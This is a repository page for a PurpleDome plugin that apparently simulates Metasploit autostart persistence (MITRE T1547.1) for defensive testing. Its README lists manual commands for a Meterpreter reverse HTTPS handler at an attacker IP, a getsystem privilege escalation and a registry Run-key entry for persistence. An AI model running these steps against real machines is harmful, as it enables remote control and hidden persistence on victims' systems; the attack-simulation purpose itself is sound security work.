You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
PurpleDome/plugins/default/metasploit_attacks/metasploit_autostart_t1547_1
Thorsten Sick 17ec685400 Enforcing proper plugin boilerplate 3 years ago
..
README.md Metasploit autostart attacks T1547. Plugin. 3 years ago
default_config.yaml Metasploit autostart attacks T1547. Plugin. 3 years ago
metasploit_autostart_1.py Enforcing proper plugin boilerplate 3 years ago

README.md

Manual operation

target: start babymetal.exe

attacker:

use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.178.189 (YMMV) set LPORT 6666 (YMMV) run 100.64.0.25 on kali 100.64.0.25 on win

getsystem reg setval -k HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -v purpledome -d c:\windows\system32\calc.exe